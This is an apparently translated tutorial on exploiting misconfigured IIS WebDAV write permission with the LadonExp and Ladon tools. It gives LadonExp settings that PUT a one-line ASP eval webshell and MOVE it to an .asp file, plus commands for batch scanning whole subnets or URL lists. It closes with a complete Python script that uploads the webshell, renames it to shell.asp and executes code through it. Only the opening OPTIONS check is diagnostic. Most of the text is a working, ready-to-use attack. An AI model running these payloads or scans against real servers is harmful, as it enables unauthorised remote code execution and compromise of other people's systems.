Original: http://k8gege.org/Ladon/iisput
LadonExp generator tutorial: exploiting the IIS write-permission (WebDAV PUT) vulnerability, covering environment setup, EXP generation, batch exploitation, and Python reproduction code.
Vulnerability cause
The vulnerability comes from server misconfiguration: the IIS server has the WebDAV component enabled, and a web directory has been granted write permission, so an unauthenticated client can write files to it over HTTP. That also makes it easy to find: send a WebDAV OPTIONS request and check whether the server advertises PUT. Note that an advertised PUT only shows that the WebDAV handler is loaded; whether a write actually succeeds is decided by the directory permissions set up in the next section.
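The OPTIONS pre-check described above, written out as an added example in Python (this is not code from the original post or from the Ladon project). It parses two constructed sample OPTIONS responses, one of the kind an IIS host with WebDAV enabled returns and one from the same host with WebDAV removed, reports whether PUT and MOVE are advertised, and includes a live probe function for a real target. The header values, the sample responses and the target URL are assumptions made for the example; the `put_move_chain` result only selects hosts worth a PUT test, it does not prove the directory is writable.

```python
# Added example, not from the original post or the Ladon project: OPTIONS
# pre-check for the WebDAV PUT -> MOVE write chain. Both sample responses are
# constructed for the example; the target URL in the probe call is an assumption.
from typing import Dict, Set
import urllib.request

# Constructed sample: what an IIS 7.5 host with WebDAV enabled might answer.
SAMPLE_WEBDAV_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, "
    "PROPPATCH, MKCOL, LOCK, UNLOCK, PUT\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, "
    "DELETE, COPY, MOVE, LOCK, UNLOCK\r\n"
    "DAV: 1,2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed sample: the same host with the WebDAV module removed.
SAMPLE_HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# WebDAV methods that change content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}


def parse_headers(raw_response: str) -> Dict[str, str]:
    """Parse the head of a raw HTTP/1.1 response into a lower-cased header dict."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def advertised_methods(headers: Dict[str, str]) -> Set[str]:
    """Union of the methods listed in Allow and Public (IIS sends both)."""
    methods: Set[str] = set()
    for name in ("allow", "public"):
        for method in headers.get(name, "").split(","):
            if method.strip():
                methods.add(method.strip().upper())
    return methods


def assess(headers: Dict[str, str]) -> dict:
    """Decide whether the host is worth a PUT -> MOVE test."""
    methods = advertised_methods(headers)
    webdav = "dav" in headers or headers.get("ms-author-via", "").upper() == "DAV"
    return {
        "webdav": webdav,
        "put": "PUT" in methods,
        "move": "MOVE" in methods,
        "write_methods": sorted(methods & WRITE_METHODS),
        # advertised PUT + MOVE is necessary, not sufficient: the directory ACL decides
        "put_move_chain": {"PUT", "MOVE"} <= methods,
    }


def probe(url: str, timeout: float = 5.0) -> dict:
    """Live OPTIONS request against a real target (network call; not used by the sample run)."""
    req = urllib.request.Request(url, method="OPTIONS")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return assess({k.lower(): v for k, v in resp.headers.items()})


if __name__ == "__main__":
    for label, raw in (("webdav", SAMPLE_WEBDAV_RESPONSE), ("hardened", SAMPLE_HARDENED_RESPONSE)):
        print(label, assess(parse_headers(raw)))
    # probe("http://192.168.1.22/")  # assumed target from the post; uncomment for a live check
```

Run as-is it evaluates the two constructed responses; for a real host call `probe()` with the base URL and only move on to the PUT step when `put_move_chain` is true. IIS lists the WebDAV methods in both Allow and Public, which is why both headers are merged.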
IIS configuration
1. Enable the WebDAV component.
2. Grant write permission on the directory (for convenience, give Everyone full write access).
3. Grant the Script source access permission (otherwise MOVE fails and you cannot get a shell).
Reproduction
LadonExp makes this class of vulnerability easy to reproduce; before Ladon was renamed (it was called Cscan) the same approach was used for Tomcat, see the Tomcat CVE-2017-12615 video: https://github.com/k8gege/K8CScan/tree/master/Video
LadonExp PUT configuration
Function: upload 123.txt
Target: http://192.168.1.22
Method: Put
addurl: 123.txt
Data: <%eval request(k8gege)%>
Click BuildExe -> TestExe to test
On success the server returns Created
LadonExp MOVE configuration
Function: rename 123.txt to 1.asp
Target: http://192.168.1.22/123.txt
Method: Move
Destination: http://192.168.1.22/1.asp
Click BuildExe -> TestExe to test
On success the server returns Created
PS: You can also PUT a file in another extension that IIS parses directly; PUT followed by MOVE is not the only way to get a shell.
Ladon batch
Scan a C-class range (A and B ranges work too). Here generated.dll stands for the DLL that LadonExp built in the step above; substitute its real name:
Ladon 192.168.1.1/c generated.dll
Ladon 192.168.1.1/24 generated.dll
TXT batch
When the targets are not in one range, put them in url.txt, one per line, for example:
http://192.168.1.1
http://192.10.5.8:808
Then run:
Ladon generated.dll
Exploit
Python exploitation code

```python
# -*- coding: utf-8 -*-
import requests

host = 'http://192.168.1.22'
put_url = host + '/2.txt'
move_url = put_url
# MOVE renames the uploaded .txt to an extension IIS will execute
move_headers = {'Destination': host + '/shell.asp'}
# one-line ASP eval shell; the parameter name (k8gege) acts as the password
put_data = "<%eval request('k8gege')%>"
# the POST key must match the request() parameter in the shell;
# the value is a harmless statement that just echoes a marker
post_data = {'k8gege': 'response.write("k8gege")'}

try:
    response = requests.request('PUT', url=put_url, data=put_data, timeout=10)
    # IIS answers a successful WebDAV PUT with 201 Created (200/204 if the file already existed)
    if response.status_code in (200, 201, 204):
        response = requests.request('MOVE', url=move_url, headers=move_headers, timeout=10)
        # MOVE also returns 201 Created on success (204 when it overwrote the destination)
        if response.status_code in (201, 204):
            response = requests.post(url=host + '/shell.asp', data=post_data, timeout=10)
            print(response.content.decode('gb2312', errors='replace'))
        else:
            print('MOVE failed:', response.status_code)
    else:
        print('PUT failed:', response.status_code)
except requests.RequestException as e:
    print('request error:', e)
```
Tool download
Latest version: https://k8gege.org/Download
Previous versions: https://github.com/k8gege/Ladon/releases
IIS Exp: https://github.com/k8gege/iisput